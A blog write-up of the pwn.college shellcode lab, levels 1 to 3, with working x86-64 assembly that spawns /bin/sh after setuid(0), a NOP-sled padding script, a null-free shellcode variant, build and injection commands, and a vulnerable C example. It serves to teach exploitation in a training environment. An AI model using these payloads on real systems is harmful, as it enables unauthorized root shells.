The pwn.college

本文最后更新于:2023年11月30日 下午

Pwn with pwn.college

shellcode

level 1

The most basic skills for writing shellcode:

Firstly, write down the assemble codes as

1
2
3
4
5
6
7
8
9
10
11
.global _start
_start:
.intel_syntax noprefix
mov rax, 59
lea rdi, [rip+binsh]
mov rsi, 0
mov rdx, 0
syscall
binsh:
.string "/bin/sh"
# shellcode.s

then make it with gcc:

1
gcc -nostdlib -static shellcode.s -o shellcode-elf

and copy it as raw code:

1
objcopy --dump-section .text=shellcode-raw shellcode-elf

now, we have the file shellcode-raw with shellcode in it.

just use the following commands to pwn the target program

1
(cat shellcode-raw ; cat) | ./target

e.g. target is a program like

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
void bye1() { puts("Goodbye!");}
void bye2() { puts("Farewell!");}
void hello(char *name , void (*bye_func)())
{
printf(" Hello %s!\n", name);
bye_func();
}
int main(int argc , char** argv)
{
char name[1024];
gets(name);

srand(time(0));
if (rand() %2) hello(bye1,name);
else hello(name , bye2);
}
//this program will execute what we input as it mistook the order of char* and func :P

back to level1, the given program will execute the shellcode we inject, and let’s see what will happen:

1
2
3
4
5
//terminal
cat: flag: Permission denied
sudo cat flag
sudo: effective uid is not 0, is sudo installed setuid root?

Although we get the shell, we didn’t get root privilege.

Modify the shellcode.s:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
.global _start
_start:
.intel_syntax noprefix

mov rax, 0x69
mov rdi, 0
syscall

mov rax, 59
lea rdi, [rip+binsh]
mov rsi, 0
mov rdx, 0
syscall
binsh:
.string "/bin/sh"

and try it again, surprisingly, it works!

level 2

As it says, this challenge will randomly skip up to 0x800 bytes in our shellcode.

So, we will make use of the NOP instruction to pass this challenge.

The NOP instruction will lead to No Operation in executing.

This is my solution:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# define the "\x90"
nop_padding = b'\x90' * 0x800

# path of the shellcode-raw
input_file_path = 'shellcode-raw' # 替换为你的文件路径

# get text
with open(input_file_path, 'rb') as input_file:
original_content = input_file.read()

# inject 0x800 of "\x90"
new_content = nop_padding + original_content

with open(input_file_path, 'wb') as output_file:
output_file.write(new_content)

This python file helped us inject some NOP instructions at the beginning of shellcode-raw, then we execute the following command:

1
(cat shellcode-raw ; cat) | ./babyshell_level2

The nop scrolls across the screen quickly from top to bottom, we successfully make it slide over the useless bytes and make the program execute our actual shellcodes.

level3

code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
.global _start
_start:
.intel_syntax noprefix

mov al, 0x69
xor rdi, rdi
syscall

mov al, 59
mov ebx, 0x68732f6e
shl rbx, 8
mov bl, 0x69
shl rbx, 8
mov bl, 0x62
shl rbx, 8
mov bl, 0x2f
push rbx
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
syscall

more details will be updated later!


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!